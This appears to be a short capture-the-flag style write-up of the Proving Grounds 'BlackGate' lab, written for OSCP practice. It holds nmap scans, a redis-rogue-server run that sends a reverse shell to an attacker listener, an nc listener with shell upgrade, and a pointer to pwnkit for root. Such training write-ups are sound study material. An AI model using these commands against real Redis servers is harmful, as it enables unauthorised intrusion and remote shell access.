Proving grounds:BlackGate
--
Today we will take a look at Proving grounds: BlackGate. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.
- Network scan
└─# nmap -Pn -p- — min-rate 10000 192.168.100.176
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-16 13:03 EDT
Warning: 192.168.100.176 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.100.176
Host is up (0.099s latency).
Not shown: 55372 closed tcp ports (reset), 10161 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
6379/tcp open redis└─# nmap -sCV -p6379 192.168.100.176
Starting Nmap 7.92 ( https://nmap.org ) at 2022–10–16 13:04 EDT
Nmap scan report for 192.168.100.176
Host is up (0.24s latency).PORT STATE SERVICE VERSION
6379/tcp open redis Redis key-value store 4.0.14
- redis (6379)
┌──(root㉿kali)-[~/ctf/redis-rogue-server]
└─# ./redis-rogue-server.py — rhost 192.168.100.176 — lhost 192.168.49.100
______ _ _ ______ _____
| ___ \ | (_) | ___ \ / ___|
| |_/ /___ __| |_ ___ | |_/ /___ __ _ _ _ ___ \ ` — . ___ _ ____ _____ _ __
| // _ \/ _` | / __| | // _ \ / _` | | | |/ _ \ ` — . \/ _ \ ‘__\ \ / / _ \ ‘__|
| |\ \ __/ (_| | \__ \ | |\ \ (_) | (_| | |_| | __/ /\__/ / __/ | \ V / __/ |
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_| \_/ \___|_|
__/ |
|___/
@copyright n0b0dy @ r3kapig[info] TARGET 192.168.100.176:6379
[info] SERVER 192.168.49.100:21000
[info] Setting master…
[info] Setting dbfilename…
[info] Loading module…
[info] Temerory cleaning up…
What do u want, [i]nteractive shell or [r]everse shell: r
[info] Open reverse shell…
Reverse server address: 192.168.49.100
Reverse server port: 6379
[info] Reverse shell payload sent.
[info] Check at 192.168.49.100:6379
[info] Unload module…
Listen
nc -nvlp 6379python3 -c 'import pty;pty.spawn("/bin/bash");'export TERM=xterm
Ctrl + z
stty raw -echo ; fg
resetprudence@blackgate:/home/prudence$ whoami
prudence
prudence@blackgate:/home/prudence$ pwd
/home/prudence
prudence@blackgate:/home/prudence$
The privesc of this machine is reverse engineering. That’s why I couldn’t solve it. But to root you can use pwnkit
“If you have any questions or comments, please do not hesitate to write. Have a good days”